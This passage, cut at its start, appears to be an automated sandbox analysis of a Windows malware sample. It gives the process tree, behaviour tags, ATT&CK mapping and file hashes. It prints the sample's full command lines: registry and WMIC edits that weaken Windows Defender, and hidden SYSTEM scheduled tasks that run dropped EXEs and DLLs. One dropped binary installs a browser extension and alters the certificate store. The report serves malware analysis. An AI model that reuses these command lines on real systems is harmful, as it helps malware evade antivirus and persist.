      [4] C:\Windows\SysWOW64\reg.exe (PID 2112)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 816)
          cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2200)
        cmdline: schtasks /CREATE /TN "gNgVmLWKk" /SC once /ST 03:07:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2120)
        cmdline: schtasks /run /I /tn "gNgVmLWKk"
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 376)
        cmdline: schtasks /DELETE /F /TN "gNgVmLWKk"
    [3] C:\Windows\SysWOW64\cmd.exe (PID 1004)
        cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      [4] C:\Windows\SysWOW64\reg.exe (PID 2932)
          cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    [3] C:\Windows\SysWOW64\cmd.exe (PID 2592)
        cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      [4] C:\Windows\SysWOW64\reg.exe (PID 2448)
          cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2572)
        cmdline: schtasks /CREATE /TN "bdmBPZkQYKMDiCzlG" /SC once /ST 00:39:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe\" 5U /WuvkdidDy 525403 /S" /V1 /F
        - Drops file in Windows directory
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2864)
        cmdline: schtasks /run /I /tn "bdmBPZkQYKMDiCzlG"
    [3] C:\Windows\SysWOW64\WerFault.exe (PID 2472)
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 492
        - Loads dropped DLL
        - Program crash
  [2] C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe (PID 1220)
      cmdline: C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe 5U /WuvkdidDy 525403 /S
      - Checks computer location settings
      - Executes dropped EXE
      - Drops Chrome extension
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Modifies data under HKEY_USERS
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2764)
        cmdline: schtasks /DELETE /F /TN "brlogsXZdQLKJRjYtj"
    [3] C:\Windows\SysWOW64\cmd.exe (PID 1088)
        cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
      [4] C:\Windows\SysWOW64\forfiles.exe (PID 2508)
          cmdline: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe (PID 1976)
            cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2624)
              cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
              - Command and Scripting Interpreter: PowerShell
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 1916)
                cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\forfiles.exe (PID 1476)
          cmdline: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe (PID 2836)
            cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2308)
              cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
              - Command and Scripting Interpreter: PowerShell
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 3040)
                cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 1240)
        cmdline: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZDLVjxnHU\YFpaxQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tRbTscEIBTcXFpe" /V1 /F
        - Drops file in Windows directory
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 1988)
        cmdline: schtasks /CREATE /TN "tRbTscEIBTcXFpe2" /F /xml "C:\Program Files (x86)\ZDLVjxnHU\friNppl.xml" /RU "SYSTEM"
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2472)
        cmdline: schtasks /END /TN "tRbTscEIBTcXFpe"
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2412)
        cmdline: schtasks /DELETE /F /TN "tRbTscEIBTcXFpe"
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 1492)
        cmdline: schtasks /CREATE /TN "UMVDLkRPlKTzVm" /F /xml "C:\Program Files (x86)\ijGSqddcuZeU2\oEsyZtI.xml" /RU "SYSTEM"
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 1960)
        cmdline: schtasks /CREATE /TN "qAaqOfviiIaiI2" /F /xml "C:\ProgramData\rPjTFWmQUriHtIVB\fsQcoiA.xml" /RU "SYSTEM"
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2040)
        cmdline: schtasks /CREATE /TN "dnxSRqgonxLOXEwjj2" /F /xml "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\RHpapsr.xml" /RU "SYSTEM"
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2780)
        cmdline: schtasks /CREATE /TN "symbKzMjSaDuuUPBtNE2" /F /xml "C:\Program Files (x86)\wWtwQxeSPhIsC\BkKLGDC.xml" /RU "SYSTEM"
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2792)
        cmdline: schtasks /CREATE /TN "SQVSLJdEAqcPOSFTe" /SC once /ST 00:29:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PfAmACXkWBLbKqPZ\McEluLOw\OnSrNDh.dll\",#1 /RAdidcMqu 525403" /V1 /F
        - Drops file in Windows directory
        - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 2696)
        cmdline: schtasks /run /I /tn "SQVSLJdEAqcPOSFTe"
    [3] C:\Windows\SysWOW64\schtasks.exe (PID 1060)
        cmdline: schtasks /DELETE /F /TN "bdmBPZkQYKMDiCzlG"
    [3] C:\Windows\SysWOW64\WerFault.exe (PID 2708)
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 1576
        - Loads dropped DLL
        - Program crash
  [2] C:\Windows\system32\rundll32.EXE (PID 2616)
      cmdline: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PfAmACXkWBLbKqPZ\McEluLOw\OnSrNDh.dll",#1 /RAdidcMqu 525403
    [3] C:\Windows\SysWOW64\rundll32.exe (PID 768)
        cmdline: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PfAmACXkWBLbKqPZ\McEluLOw\OnSrNDh.dll",#1 /RAdidcMqu 525403
        - Blocklisted process makes network request
        - Checks BIOS information in registry
        - Loads dropped DLL
        - Drops file in System32 directory
        - Enumerates system info in registry
        - Modifies data under HKEY_USERS
      [4] C:\Windows\SysWOW64\schtasks.exe (PID 1472)
          cmdline: schtasks /DELETE /F /TN "SQVSLJdEAqcPOSFTe"

[1] C:\Windows\system32\taskeng.exe (PID 1656)
    cmdline: taskeng.exe {5DB0FBA7-B769-491B-8CB1-9343CC48DFB0} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 2832)
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe (PID 2052)
        cmdline: "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 1376)
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe (PID 1084)
        cmdline: "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 1500)
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe (PID 2204)
        cmdline: "C:\Windows\system32\gpupdate.exe" /force

[1] C:\Windows\system32\gpscript.exe (PID 748)
    cmdline: gpscript.exe /RefreshSystemParam

[1] C:\Windows\system32\gpscript.exe (PID 944)
    cmdline: gpscript.exe /RefreshSystemParam

[1] C:\Windows\system32\gpscript.exe (PID 2092)
    cmdline: gpscript.exe /RefreshSystemParam
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads
SHA256c32807f003f32225bac2478e900b302e3b512b4de7dd9e246a892b01378f97cc
SHA51266834633d63a04e2e738b6ec7e4cb0d0ad1e88ffeca35a43a287b6c505023e1101b69d344898511b259c3742f767a1fe485bb1559e3bebb41c8d84ec4f72f667